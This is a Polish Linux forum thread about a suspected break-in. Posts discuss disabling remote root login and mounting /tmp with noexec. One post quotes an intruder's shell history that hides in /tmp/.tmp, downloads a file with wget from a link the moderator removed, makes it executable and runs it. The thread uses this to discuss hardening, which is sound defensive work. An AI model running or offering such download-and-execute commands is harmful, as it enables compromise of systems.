Skocz do zawartości

Włamanie?


narrow

Rekomendowane odpowiedzi

: możliwość zdalnego logowania jako root (tekstowo i przez GDM) - to jest domyślne ("Ustawienia ekranu logowania", zakładka "Bezpieczeństwo").

też tych udogodnień nie lubię:

możliwość zdalnego logowania

 

nawet temat przyklejony przydał by się jak co odhaczyć , i jakie usługi wywalić

bo ja na ślepo na początku szukałem

 

Narka

Edytowane przez jaro33
Odnośnik do komentarza
Udostępnij na innych stronach

Ech, PM dalej nie działa, więc musze tutaj. _Pat może warto w takim razie również zmoderować fragment mojego pierwszego (drugiego w ogóle w tym wątku) wpisu - średnio inteligentny wielbiciel pingwinów łatwo pożeni zmoderowane wpisy z postu narrowa z moimi wypocinami nt. abuse.

Pozdr,

W.

Odnośnik do komentarza
Udostępnij na innych stronach

  • 4 months later...

...
cd /tmp
cd .tmp
mkdir .tmp
cd .tmp
wget link_usunięty_przez_modratora/loco1/aVe.txt;chmod 777 *
./aVe.txt
./aVe.txt
...

co radzicie?

 

Zeby uniknąć tego taku wystarczyłoby teoretycznie bardzo proste rozwiązanie, a mianowicie osobna partycja /tmp i montowanie jej z opcją noexec (Tak powinna być zawsze zabezpieczona ta partycja). Niestety jak już wspomniałem to tylko teoria, gdyż w praktyce po zamontowaniu partycji /tmp z opcją noexec nie uruchomi nam się znaczna część programów... (co jest wg. mnie ewidentnym błędem tych programów) :|

Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
×
×
  • Dodaj nową pozycję...